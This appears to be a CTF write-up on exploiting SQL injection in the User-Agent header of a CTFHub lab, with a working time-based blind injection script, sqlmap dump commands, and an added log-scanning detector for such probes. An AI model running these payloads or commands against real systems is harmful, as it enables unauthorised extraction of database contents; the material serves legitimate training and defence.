Manual injection
Open the target machine
![](https://img2020.cnblogs.com/blog/1753051/202003/1753051-20200318132621821-743268908.png)
Look at the page information
![](https://img2020.cnblogs.com/blog/1753051/202003/1753051-20200318132647713-285698803.png)
Capture the request
![](https://img2020.cnblogs.com/blog/1753051/202003/1753051-20200318132742207-203352817.png)
According to the hint, the injection point is in the User-Agent request header
Start trying injection
Successfully retrieved the database name
![](https://img2020.cnblogs.com/blog/1753051/202003/1753051-20200318132926844-983877383.png)
Query the table names
![](https://img2020.cnblogs.com/blog/1753051/202003/1753051-20200318133108961-77321255.png)
Query the column names
![](https://img2020.cnblogs.com/blog/1753051/202003/1753051-20200318133213013-1875627322.png)
Query the column contents
![](https://img2020.cnblogs.com/blog/1753051/202003/1753051-20200318133359440-1230303218.png)
Successfully got the flag
Blind injection
Test whether time-based blind injection is possible
![](https://img2020.cnblogs.com/blog/1753051/202003/1753051-20200318133914684-740489584.png)
The test succeeded; start the blind injection
Query the database name
![](https://img2020.cnblogs.com/blog/1753051/202003/1753051-20200318134436999-218326523.png)
Query the table names
![](https://img2020.cnblogs.com/blog/1753051/202003/1753051-20200318140706436-739447313.png)
Query the column names
![](https://img2020.cnblogs.com/blog/1753051/202003/1753051-20200318140850527-1717441640.png)
Query the column contents
![](https://img2020.cnblogs.com/blog/1753051/202003/1753051-20200318141953303-263328504.png)
Successfully got the flag
The script is attached below
```python
#! /usr/bin/env python
# _*_ coding:utf-8 _*_
import requests
import sys
import time

session = requests.session()
url = "http://challenge-b9c5b7da113041c6.sandbox.ctfhub.com:10080/"
name = ""

# Earlier stages (database name, table name, column name), left commented out;
# uncomment the payload for the stage you are on.
# for i in range(1, 20):
#     print(i)
#     # Try printable ASCII from high to low
#     for j in range(127, 31, -1):
#         str_ascii = chr(j)
#         # Database name
#         #payload = "if(substr(database(),%s,1) = '%s',sleep(1),1)" % (str(i), str(str_ascii))
#         # Table name
#         #payload = "if(substr((select group_concat(table_name) from information_schema.tables where table_schema='sqli'),%d,1) = '%s',sleep(1),1)" % (i, str(str_ascii))
#         # Column name
#         payload = "if(substr((select group_concat(column_name) from information_schema.columns where table_name='rkhbzrszjl' and table_schema='sqli'),%d,1) = '%s',sleep(1),1)" % (i, str(str_ascii))
#         headers = {'User-Agent': payload}
#         start_time = time.time()
#         session.get(url, headers=headers)
#         end_time = time.time()
#         t = end_time - start_time
#         if t > 1:
#             if str_ascii == " ":
#                 sys.exit()
#             else:
#                 name += str_ascii
#                 break
#     print(name)

# Query the column contents (the flag)
for i in range(1, 50):
    print(i)
    # Try printable ASCII from high to low; the response is delayed by sleep(1)
    # only when the guessed character at position i matches
    for j in range(127, 31, -1):
        str_ascii = chr(j)
        payload = "if(substr((select kdulqytdrv from sqli.rkhbzrszjl),%d,1) = '%s',sleep(1),1)" % (i, str_ascii)
        headers = {'User-Agent': payload}
        start_time = time.time()
        session.get(url, headers=headers)
        end_time = time.time()
        t = end_time - start_time
        if t > 1:
            if str_ascii == "+":
                sys.exit()
            else:
                name += str_ascii
                break
    print(name)
```
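As an added defender-side example (not part of the original writeup), the following Python scans web-server log lines for the User-Agent timing probes used above and correlates the `sleep()` / `if(substr(` signatures with slow responses per source address, so a server-side delay that only fires when the guessed character matches shows up as a pattern of alternating fast and slow hits from one client. The log layout (combined format with response time appended), the sample lines and the 1-second threshold are assumptions constructed for this example.

```python
import re
from collections import Counter

# Constructed sample lines: nginx-style combined format with the upstream
# response time in seconds appended as the last field (assumed layout, not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [18/Mar/2020:13:39:14 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)" 0.012
10.0.0.9 - - [18/Mar/2020:13:39:20 +0000] "GET / HTTP/1.1" 200 512 "-" "if(substr(database(),1,1) = 's',sleep(1),1)" 1.031
10.0.0.9 - - [18/Mar/2020:13:39:21 +0000] "GET / HTTP/1.1" 200 512 "-" "if(substr(database(),1,1) = 'r',sleep(1),1)" 0.014
10.0.0.9 - - [18/Mar/2020:13:39:23 +0000] "GET / HTTP/1.1" 200 512 "-" "' or sleep(5)#" 5.020
10.0.0.7 - - [18/Mar/2020:13:40:01 +0000] "GET / HTTP/1.1" 200 512 "-" "curl/7.68.0" 0.011
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \d+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)" (?P<rt>[\d.]+)$'
)

# Signatures of MySQL delay primitives and the if(substr(...)) extraction idiom
# seen in the header payloads above; case-insensitive and whitespace tolerant.
TIMING_SIGS = re.compile(
    r"\b(sleep|benchmark)\s*\(|\bif\s*\(\s*substr(ing)?\s*\(",
    re.IGNORECASE,
)

def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["rt"] = float(rec["rt"])
    return rec

def is_timing_probe(user_agent):
    """True if the User-Agent value carries a time-based injection signature."""
    return TIMING_SIGS.search(user_agent) is not None

def analyze(log_text, slow_threshold=1.0):
    """Per source IP: number of probe requests, and how many of them were slow.
    A slow probe means the injected condition evaluated true on the server."""
    probes, slow = Counter(), Counter()
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None or not is_timing_probe(rec["ua"]):
            continue
        probes[rec["ip"]] += 1
        if rec["rt"] >= slow_threshold:
            slow[rec["ip"]] += 1
    return {"probes": dict(probes), "slow": dict(slow)}
```

The remediation on the application side is to never concatenate the header value into SQL; bind it as a parameter when the User-Agent is logged or stored.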
sqlmap
Query the database names
```bash
python2 sqlmap.py -u http://challenge-b9c5b7da113041c6.sandbox.ctfhub.com:10080/ --level 3 --dbs
```
![](https://img2020.cnblogs.com/blog/1753051/202003/1753051-20200318143145332-1594660119.png)
Query the table names
```bash
python2 sqlmap.py -u http://challenge-b9c5b7da113041c6.sandbox.ctfhub.com:10080/ --level 3 -D sqli --tables
```
![](https://img2020.cnblogs.com/blog/1753051/202003/1753051-20200318143227505-1346504864.png)
Query the column names
```bash
python2 sqlmap.py -u http://challenge-b9c5b7da113041c6.sandbox.ctfhub.com:10080/ --level 3 -D sqli -T rkhbzrszjl --columns
```
![](https://img2020.cnblogs.com/blog/1753051/202003/1753051-20200318143314886-1315446009.png)
Query the column contents
```bash
python2 sqlmap.py -u http://challenge-b9c5b7da113041c6.sandbox.ctfhub.com:10080/ --level 3 -D sqli -T rkhbzrszjl -C kdulqytdrv --dump
```
![](https://img2020.cnblogs.com/blog/1753051/202003/1753051-20200318143445258-886298990.png)
Successfully got the flag